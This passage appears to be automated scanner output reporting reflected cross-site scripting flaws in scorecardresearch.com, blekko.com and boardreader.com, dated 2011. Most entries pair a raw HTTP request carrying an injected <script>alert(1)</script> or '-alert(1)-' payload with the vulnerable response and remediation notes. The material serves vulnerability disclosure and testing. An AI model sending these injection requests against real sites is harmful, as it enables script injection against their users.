GET /beacon.js?c1=3&c2=6035338&c3=507003329d7a<script>alert(1)</script>1b41605cfe3&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 950d1<script>alert(1)</script>79857982068 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113950d1<script>alert(1)</script>79857982068&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 9641e<script>alert(1)</script>c02414cca98 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=590678989641e<script>alert(1)</script>c02414cca98&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7176f<script>alert(1)</script>cc305f915b3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=7176f<script>alert(1)</script>cc305f915b3& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:55 GMT
Date: Wed, 02 Feb 2011 15:31:55 GMT
Connection: close
Content-Length: 3603
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload def48<script>alert(1)</script>a050df307b6 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=xdef48<script>alert(1)</script>a050df307b6 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload d17f0<script>alert(1)</script>b1b056eeebb was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response below is served as text/plain and this endpoint is the site's autocomplete feed, so the injected markup is only rendered if the consuming script inserts the body into the DOM as HTML (innerHTML rather than textContent) or if a browser navigating to the URL directly sniffs the body as HTML; check the client-side code and whether an X-Content-Type-Options: nosniff header is present when assessing impact.
Request
GET /autocomplete?term={searchTerms}d17f0<script>alert(1)</script>b1b056eeebb&lang={language?}&form=opensearch HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:04 GMT
Vary: Accept-Encoding
Content-Length: 58
X-Blekko-PT: 9997f158d202984eeb76c315478564b1
1.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/2mdn.net/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b358d'-alert(1)-'f4b7b9879fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/2mdn.net/x22?b358d'-alert(1)-'f4b7b9879fc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:19:53 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:54 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="verif ...[SNIP]...
<script>
var ACTIVE_GRAPH_GROUP = 'day';
var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&b358d'-alert(1)-'f4b7b9879fc=1&p=30&d=1288898394&b=0&g=&x=1';
var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.84. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/2mdn.net/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebef7"><script>alert(1)</script>6f696982a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/2mdn.net/x22?ebef7"><script>alert(1)</script>6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:59 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:01 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/2mdn.net%2Fx22?ebef7"><script>alert(1)</script>6f696982a6d=1"> ...[SNIP]...
1.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/aol.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94a63'-alert(1)-'782a59af270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/aol.com?94a63'-alert(1)-'782a59af270=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:02:03 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:02:10 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=aol.com&94a63'-alert(1)-'782a59af270=1&p=30&d=1288940530&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.86. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/aol.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e75"><script>alert(1)</script>f6043616387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/aol.com?f0e75"><script>alert(1)</script>f6043616387=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:01:40 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:01:45 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/aol.com?f0e75"><script>alert(1)</script>f6043616387=1"> ...[SNIP]...
1.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/cafemom.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3ee"><script>alert(1)</script>40468857845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:05 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:18 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1"> ...[SNIP]...
1.88. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/cafemom.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3d7'-alert(1)-'2f4ee664641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/cafemom.com?3c3d7'-alert(1)-'2f4ee664641=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:47 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=cafemom.com&3c3d7'-alert(1)-'2f4ee664641=1&p=30&d=1288939967&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/myegy.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f3c"><script>alert(1)</script>bb270b2c8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:29 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:58:37 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1"> ...[SNIP]...
1.90. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/myegy.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1683'-alert(1)-'aae0d7e564f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/myegy.com?c1683'-alert(1)-'aae0d7e564f=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:55 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:59:00 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=myegy.com&c1683'-alert(1)-'aae0d7e564f=1&p=30&d=1288940340&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/nolanfans.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7be"><script>alert(1)</script>8eb8f9da978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:53 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:09 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1"> ...[SNIP]...
1.92. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/nolanfans.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9419e'-alert(1)-'6dbeba69c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/nolanfans.com?9419e'-alert(1)-'6dbeba69c1=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
